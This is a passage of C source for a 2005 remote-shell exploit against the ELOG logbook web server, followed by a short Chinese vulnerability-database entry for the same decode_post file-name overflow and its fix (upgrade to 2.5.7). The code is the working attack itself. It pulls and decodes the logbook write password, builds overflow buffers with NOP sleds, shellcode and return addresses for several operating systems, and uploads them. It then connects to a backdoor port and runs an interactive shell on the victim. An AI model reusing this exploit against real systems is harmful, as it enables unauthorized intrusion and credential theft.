  sprintf(request + strlen(request), "Authorization: Basic %s\r\n",encuserandpass);
  sprintf(request + strlen(request), "Content-Length: %d\r\n\r\n", content_length);    
  bzero(encoded_url,sizeof(encoded_url));
  return(p);
}



long          get_host_ip(char *hname)
 {
  long ip_add;
  struct hostent *h;
   if((ip_add = inet_addr(hname)) < 0)
    {
     h = gethostbyname(hname);
      if(h == NULL)
        {
         fprintf(stderr,"[-]Can not resolve IP address\n");
         exit(1);
        }
      memcpy(&ip_add,h->h_addr,h->h_length);
    } 
   return(ip_add);
 }





int                 check_for_clear_sector(char *hostname,unsigned short port,char *logbook,int flag)
 {
   struct        sockaddr_in rem_addr;
   char          sendbuf[SENDBUFSIZE];
   char          *sendbufp;
   char          getbuf[GETBUFSIZE];
   char          *reqbuf;
   char          notfound[100];
   int           yes;
   int           total;
   int sock;
   int          flagchoice;
   struct timeval w_t;
   fd_set          read_fd;
   int            total_fd;

           PRINTINFO(MSGSECTOR,debug);
           LOGBOOKNOTFOUND(notfound,logbook);             

HEAD:   
          bzero(&w_t,sizeof(w_t));

          w_t.tv_sec     = TIMEOUT;
          w_t.tv_usec    = 0;

             if(flag == 0)
             flagchoice = NOTUPLOADME;
             else 
             flagchoice = UPLOADME;
   
         sock      = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
          if(sock < 0)
           {
            perror("socket");
            exit(1);
           }
         if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
           { perror("setsockopt");
           close(sock);
           exit(1);
           }
  

          memset(&(rem_addr.sin_zero),'\0',8);
          rem_addr.sin_family = AF_INET;
          rem_addr.sin_port   = htons(port);
          rem_addr.sin_addr.s_addr = get_host_ip(hostname);

            if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
             {  
             fprintf(stderr,"[-] Can not Connect to server!\n");
             exit(1);
             }
        
          sendbufp = make_http_content(flagchoice,logbook);
          reqbuf = make_request_header(logbook,boundary,0);
          strcpy(sendbuf,reqbuf);
          strcat(sendbuf,sendbufp);

           if( (send(sock,sendbuf,sizeof(sendbuf),0)) < 0 )
            {
            perror("send");
            exit(-1);
            close(sock);
            }

               FD_ZERO(&read_fd);
               FD_SET(sock,&read_fd);
      
               if( (total_fd = select(sock + 1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
                {
                perror("select");
                close(sock);
                exit(-1);
                }

           
               if(FD_ISSET(sock,&read_fd))
                {
                 if( (total = recv(sock,getbuf,sizeof(getbuf),0)) < 1) {
                    if(errno == EWOULDBLOCK ){
                       NPRINTINFO(REMDOWN);
                       PRINTINFO(REMCRASHED,1);
                       close(sock); 
                       exit(-1);
                       }
                    close(sock);
                    exit(1);
                    }
                 if(strstr(getbuf,INVALIDURL)) {
                     fprintf(stderr,"[-] Invalid URL Bitch, Type the Correct Path\n");
                     close(sock);
                     exit(-1);
                     }              

                 if(strstr(getbuf,AUTHORIZED_DENY)) {
                    fprintf(stderr,"[-] Type User name and Password for login Bitch\n");
                    close(sock);
                    exit(-1);
                     }

                 if(strstr(getbuf,notfound)) {
                   fprintf(stderr,"[-] NO %s LOGBOOK DEFINED BITCH\n",logbook);
                   close(sock);
                   exit(-1);
                     }   
                
                 if(strstr(getbuf,ASKEDPASS)) {
                   NPRINTINFO(PASSALERT);
                   crack_the_code(hostname,port,logbook);
                   close(sock);
                   bzero(getbuf,sizeof(getbuf));
                   goto HEAD;
                     }
                
                 if(strstr(getbuf,ATTOPTERR)) {
                   PRINTINFO(READOPTION,1);
                   close(sock);
                   bzero(getbuf,sizeof(getbuf));
                   spy_attr_options(hostname,port,logbook);
                   goto HEAD;
                     }
                 if(strstr(getbuf,ATTERR)) {
                   get_missing_attributes(getbuf,ATTERR,MISSED[globcount].addr);                       
                   ATTNOTFOUND(MISSED[globcount].addr);
                   MAKINGATT (MISSED[globcount].addr);
                   globcount++;
                   bzero(getbuf,sizeof(getbuf));                   
                   re_check_sector(hostname,port,logbook,flag);                  
                     }

                 if(strstr(getbuf,SECTOR_CLEAR)) {
                    PRINTINFO(CLEARAREA,1);
                    close(sock);
                    do_last_stage(hostname,port,logbook);
                    we_r_coming(hostname);
                    }
           }    
 return(1);
}


void                get_missing_attributes(char *attbuf, char *errmessage,char *glob_att)
{
  int            i,j = 0;
  char           *p,*k;
  p              = attbuf;
  k              = glob_att;
  
        bzero(glob_att,sizeof(glob_att));

   if(strstr(p,errmessage)){
      i = strlen(p) - strlen(strstr(p,ATTERRTAG));
         if( *(char *)(p+i) == '<' && *(char *)(p+i+2) == '>' ) {
           j = i+3;
            for( ; *(char *)(p+j) != '<' && *(char *)(p+j+3) != '>' ; j++ ) {
                *k++ = *(char *)(p+j);
                }

            *k = '\0';
            return;
          }
    }
 return;
}

void              alloc_all_globalz(void)
{
    ZEROGLOB(glob1_att);   
    ZEROGLOB(glob2_att);  
    ZEROGLOB(glob3_att);   
    ZEROGLOB(glob4_att);   
    ZEROGLOB(glob5_att);   
    ZEROGLOB(glob6_att);   
    ZEROGLOB(glob7_att);   
    ZEROGLOB(glob8_att);   
    ZEROGLOB(glob9_att);  
    ZEROGLOB(glob10_att);

}


int               is_there_attribute(void)
{
  int           i = 0;
  int           j = 0;
   for(i = 0; i<10 ; i++) {
    if(strlen(MISSED[i].addr))
      j++;
    }
return(j);
}


void                  re_check_sector(char *hostname,unsigned short port,char *logbook,int flag)
{ 
  debug++;
  if(recount++ >= 10 ){
  NPRINTINFO(BIGOPTIONLIST);
  exit(1);
  } 
  check_for_clear_sector(hostname,port,logbook,flag);
}


void                 spy_attr_options(char *hostname,unsigned short port,char *logbook)
{
 int                 soc;
 int                 ready;
 int                 yes = 0;
 char                request[REQUESTSIZE];
 fd_set              read_fd;
 struct              timeval    w_t;
 struct              sockaddr_in rem_addr; 
 int                 k,i = 0;
 int                 n = 0;
 char                response[6900];
 char                temp[100];
 char                *p,*z;

        bzero(response,sizeof(response));
        bzero(temp,sizeof(temp));
        make_spy_header(hostname,port,request,logbook);
        w_t.tv_sec   = TIMEOUT;
        w_t.tv_usec  = 0;

         soc      = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
           if(soc < 0){
              perror("socket");
              exit(1);     
            }
          if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int)))
            { perror("setsockopt");
              close(soc);
              exit(1);
            }

    memset(&(rem_addr.sin_zero),'\0',8);
    rem_addr.sin_family = AF_INET;
    rem_addr.sin_port   = htons(port);
    rem_addr.sin_addr.s_addr = get_host_ip(hostname);

         if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr)))
          {
          fprintf(stderr,"[-] Can not Connect to server!\n");
          exit(1);
          }
                 
         if( (send(soc,request,strlen(request),0)) < 0 )
          {
           perror("send");
           exit(-1);
           close(soc);
          }
             FD_CLR(soc,&read_fd);
             FD_ZERO(&read_fd);
             FD_SET(soc,&read_fd);
    
         if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0)
          {
           perror("select read socket");
           close(soc);
           exit(1);
          }
        
         if(FD_ISSET(soc,&read_fd)){         
            i = recv(soc, response, 100, 0);
             if (i < 0) {
              perror("Cannot receive response");
              exit(1);
              }
      
           n = i;
            while (i > 0) {
              i = recv(soc, response + n, 100, MSG_DONTWAIT);
              if (i > 0)
              n += i;
              if(i <= 0)
              break;
             }
           response[strlen(response)] = '\0';
           close(soc);
           fflush(stdin);

#define findme(x,y)  {sprintf(x,"Options %s =%c",y,0x20);}

           for(i = 0 ; MISSED[i].addr != NULL ; i++) {
             findme(temp,MISSED[i].addr);
              if((p = strstr(response,temp)) != NULL) {
                 z = TRASH[i].addr;
                 while( (!iscntrl(*p+1) || isalnum(*p+1))){
                    *z = *(char *)(p + strlen(temp)); 
                    z++;
                    p++;
                 }
              for(k = 0; TRASH[i].addr[k] ; k++) {
                  if((TRASH[i].addr[k] == ',') || (TRASH[i].addr[k] == '\n')) {
                     TRASH[i].addr[k] = '\0';
                   }
              }
              bzero(temp,sizeof(temp));
              }
           }
         
}          
   return;
   
}         


void             crack_the_code(char *hostname,unsigned short port,char *logbook) 
{
 
 int                 soc;
 int                 ready;
 int                 yes = 0;
 char                request[REQUESTSIZE];
 fd_set              read_fd;
 struct     timeval  w_t;
 struct sockaddr_in  rem_addr;
 int                 i = 0;
 int                 n = 0;
 char                response[6900];
 char                wpassbuf[100];
 char                *z; 
 char                *p = wpassbuf;
 char                *w = wpassbufenc; 

        bzero(wpassbuf,sizeof(wpassbuf));
        bzero(wpassbufdec,sizeof(wpassbufdec));
        make_spy_header(hostname,port,request,logbook);

         w_t.tv_sec = TIMEOUT;
         w_t.tv_usec = 0;
          soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
           if(soc < 0)
            {
            perror("socket");
            exit(1);
            }
    
          if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
            perror("setsockopt");
            close(soc);
            exit(1);
           }
    
       memset(&(rem_addr.sin_zero),'\0',8);
       rem_addr.sin_family = AF_INET;   
       rem_addr.sin_port   = htons(port);
       rem_addr.sin_addr.s_addr = get_host_ip(hostname);
       PRINTINFO(GETINGPASS,1);       
           if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
             fprintf(stderr,"[-] Can not Connect to server!\n");
             exit(1);
            }
      
           if( (send(soc,request,strlen(request),0)) < 0 ){
             perror("send");
             exit(-1);
             close(soc);
           }
             FD_CLR(soc,&read_fd);
             FD_ZERO(&read_fd);
             FD_SET(soc,&read_fd);

  
           if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
             perror("select read socket");
             close(soc);
             exit(1);
            }
               if(FD_ISSET(soc,&read_fd)){
                  i = recv(soc, response, 30, 0);
                   if (i < 0) {
                    perror("Cannot receive response");
                    return ;
                   }    
                  n = i;
                   while (i > 0) {
                    i = recv(soc, response + n, 30, MSG_DONTWAIT);
                       if (i > 0)
                       n += i;
                       if(i <= 0)
                       break;
                    }
          response[strlen(response)] = '\0';
          close(soc);
          fflush(stdout);
               if((z = strstr(response,"Write Password=")) != NULL) 
                 while((*(char *)(z + 15)) != EOF  && isgraph(*(char *)(z + 15))) {
                   if( *(char *)(z + 15) == 'W') {
                     if(! isascii(*(char *)(z+16)))
                      break;
                     }
                 *p = *(char *)(z + 15);
                 z++;
                 p++;       
               }
      
                 else {NPRINTINFO(PASSFAILED); exit(EXIT_FAILURE);}
                 base64_decode(wpassbuf,wpassbufdec);
                 strncpy(w,wpassbuf,sizeof(wpassbuf));
         
                     for(i = 0; isgraph(wpassbufdec[i]) ; i++)
                      { }
                    wpassbufdec[i] = '\0';
                    PRINTINFO(PASSSUCCESS,1);
                    printf(""GREEN"[+]Write Password = "DEFAULT" "GREEN"%s"DEFAULT"\n",wpassbufdec);
      }
}


void           make_spy_header(char *hostname,short port, char *buf,char *logbook)
{

 char          *url_enc = urlencode(logbook);

 bzero(buf,sizeof(buf));
 strncpy(buf,GETREQ,sizeof(GETREQ));
 sprintf(buf + strlen(buf), "%s/",url_enc);
 sprintf(buf + strlen(buf), "%s",GETREQCMD);
 strcat (buf,  HTTPVER);
 sprintf(buf + strlen(buf), "Host: %s:%d\r\n", hostname,port);
 sprintf(buf + strlen(buf), "User-Agent: ELOG\r\n");
 sprintf(buf + strlen(buf), "Accept-Language: en-us,en;q=0.5\r\n");
 sprintf(buf + strlen(buf), "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
 sprintf(buf + strlen(buf), "Accept-Encoding: gzip,deflate\r\n");
 sprintf(buf + strlen(buf), "Keep-Alive: 300\r\n");
 sprintf(buf + strlen(buf), "Connection: keep-alive\r\n");
 sprintf(buf + strlen(buf), "Authorization: Basic %s\r\n\r\n",encuserandpass);
}


void        authorize_user(char *user , char *pass)
{

     char          *p;
     char          *k;
       p = (char *)&userandpass[0];
       k = (char *)&encuserandpass[0];

       bzero(userandpass,sizeof(userandpass));
       bzero(encuserandpass,sizeof(encuserandpass));

     sprintf(p,"%s%c",user,':');
     sprintf(p + strlen(p) ,"%s",pass);
     base64_encode(userandpass,encuserandpass);

}

void        build_att_buffer(int choice,int vendor)
{
   unsigned int *i;
   char              *c;
     if(choice == 0)
      c = lnx_shellcode;
     if(choice == 1)
      c = bsd_shellcode;
     if(choice == 2) {
      bzero(windozetext,sizeof(windozetext));
      c = win_shellcode;
      memset(windozebuf,'Z',sizeof(windozebuf));
      memset(windozetext,NOP,sizeof(windozetext));
      i = (int *)&windozebuf[242];
     *i = TARGETZ[vendor].ret;
      strcpy(&windozetext[sizeof(windozetext) -strlen(c)],c);  
      return;
      }       
   bzero(shbuffer,sizeof(shbuffer));
   bzero(bigbuffer,sizeof(bigbuffer));
   bzero(debianbuffer,sizeof(debianbuffer));
   memset(bigbuffer,NOP,sizeof(bigbuffer));

   memset(shbuffer,'A',sizeof(shbuffer));
   memset(debianbuffer,'A',sizeof(debianbuffer));
   memset(fedorabuf,'B',sizeof(fedorabuf));
   strcpy(&bigbuffer[BIGBUFSIZE - strlen(c)],c);
    if(vendor == 4) {
     i = (int *)&fedorabuf[284];
    }    
    if(vendor == 5 || vendor == 2 ){
    i = (int *)&debianbuffer[260];
    }
    if((vendor != 4) && (vendor != 5) && (vendor != 6) && (vendor != 2)){   
    i = (int *)&shbuffer[284];
    }
   *i = TARGETZ[vendor].ret;
 return;
}


void        do_last_stage(char *hostname,short port,char *logbook)
{
 int                 soc;
 int                 yes = 0;
 struct              sockaddr_in rem_addr;
 char                angelform[SENDBUFSIZE]; 
 char                *content;
 int                 flagz = UPLOADME;
 
 bzero(angelform,sizeof(angelform));
 content = make_http_content(flagz,logbook);
 strcat(angelform,make_request_header(logbook,boundary,0));
 strcat(angelform,content);
         soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
           if(soc < 0)
            {
            perror("socket"); 
            exit(1);
            }
                     
          if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
            perror("setsockopt");
            close(soc);  
            exit(1);
           }
       memset(&(rem_addr.sin_zero),'\0',8);
       rem_addr.sin_family = AF_INET;
       rem_addr.sin_port   = htons(port);
       rem_addr.sin_addr.s_addr = get_host_ip(hostname);

         if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
             fprintf(stderr,"[-] Can not Connect to server!\n");
             exit(1);
            }
                 
           if( (send(soc,angelform,strlen(angelform),0)) < 0 ){
             perror("send");
             exit(-1);
             close(soc); 
           }

   close(soc);
return;
}


void                we_r_coming(char* hostname)
{
       int sock;
       int yes;
       short port;
       struct sockaddr_in rem_addr;
           
           port = BACKDOOR;
           if(id == 6){
           port = WINBACKDOOR;
           }
           if(id == 2 || id == 10 || id == 11){
           port = BSDBACKDOOR;
           }             
           sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
           if(sock < 0)
            {
            perror("socket");
            exit(1);
            }
                
          if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
            perror("setsockopt");
            close(sock);
            exit(1);    
            }

                 memset(&(rem_addr.sin_zero),'\0',8);
                 rem_addr.sin_family = AF_INET;
                 rem_addr.sin_port   = htons(port);
                 rem_addr.sin_addr.s_addr = get_host_ip(hostname);
         
                    sleep(4);
                    if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
                      NPRINTINFO(REMCRASHED);
                      close(sock);
                      exit(1);
                      }
                 shell(sock);
exit(0);
}

void                shell(int sock)
{
        fd_set  fd_read;
        char buffer[1024],*cmd = (id == 6 ? WINCMD : COMMAND);
        int size;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock,&fd_read);
                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((size = recv(sock, buffer, sizeof(buffer), 0)) < 0){
                                NPRINTINFO(NODATA);
                                exit(1);
                        }

                        if (write(1, buffer, size) < 0) break;
                }

                if (FD_ISSET(0, &fd_read)) {

                        if((size = read(0, buffer, sizeof(buffer))) < 0){
                                NPRINTINFO(NODATA);
                                exit(1);
                        }

                        if (send(sock, buffer, size, 0) < 0) break;
                }

                usleep(30);
        }

        NPRINTINFO(REMDOWN);
        exit(0);
}


void             banner(void)
{
 puts(""GREEN"n4rk0tix(4DDICT3DZ)"DEFAULT"  *nix/Windows Elog E.L remote $hell exploit\n");
 return;
}
 
void             usage(char * arg)
{
 fprintf(stderr,"Usage :%s -h hostname\n"
                "    \t\t\t -p port\n"
                "    \t\t\t -l logbookname\n"
                "    \t\t\t -o Operating System ID\n"
                "    \t\t\t -d List Operating system ID\n"
                "    \t\t\t -u logbook user for read(If required)\n"
                "    \t\t\t -r logbook password for read (If required)\n"
                "    \t\t\t -w logbook password for write(If required)\n",arg
         );
 return;
}
 
void             listos(void)
{
  int         i;
   for(i = 0; TARGETZ[i].id != -1 ; i++)
    {
     printf("%d = %s\n",i,TARGETZ[i].distro);
    }

return;
}
/* Vert3k, hic bir zaman senin inandigina inanmadim, koda tapan ben deilim*/

// milw0rm.com [2005-02-09]
		

- 漏洞信息

13812
ELOG decode_post Function File Name Processing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-14 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.5.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站